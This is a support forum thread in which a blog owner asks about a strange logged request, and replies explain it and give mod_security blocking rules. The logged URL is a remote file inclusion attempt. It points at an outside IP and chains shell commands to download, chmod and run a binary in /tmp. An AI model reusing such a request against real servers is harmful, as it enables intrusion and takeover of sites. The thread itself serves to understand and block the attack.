Support » Fixing WordPress » Does anyone know what this is?

  • I got a really odd hit on my blog, according to the counterize stats page. I got a request for this URL

    /index.php?option=com_content& do_pdf=1&id=1index2.php?_REQUE ST[option]=com_content&_REQUES T[Itemid]=1&GLOBALS=&mosConfig _absolute_path=http://72.18.19 5.161/cmd.gif?&cmd=cd /tmp;wget;chmod 744 lnikon;./lnikon;echo YYY;echo|

    Anyone have any clue what this is? Is it an attempt to burrow through a security hole or something – should I be concerned?

Viewing 4 replies - 1 through 4 (of 4 total)
  • script kiddies…its an attempted exploit, yes. I wouldnt worry too much though and if you have mod_security avialble you can block it and any similar requests completely.

    How would you block something like that with mod_security?

    mod_security adresses that very attack with this:

    #remote file inclusion generic attack signature
    SecFilterSelective THE_REQUEST ".(dat|gif|jpg|png|bmp|txt|vir|dot)?" chain
    SecFilter "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)"
    SecFilterSelective THE_REQUEST ".(dat|gif|jpg|png|bmp|txt|vir|dot)?&(cmd|command|inc|name)="
    SecFilterSelective ARGS ".(dat|gif|jpg|png|bmp|txt|vir|dot)" chain
    SecFilter "?&(cmd|inc|name)="
    SecFilterSelective ARGS ".(dat|gif|jpg|png|bmp|txt|vir|dot)?&(cmd|inc|name)="
    SecFilterSelective REQUEST_URI ".php?.*=(http|https|ftp):/.*?&cmd="

    thats one of the already put-together rules from gotroot

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Does anyone know what this is?’ is closed to new replies.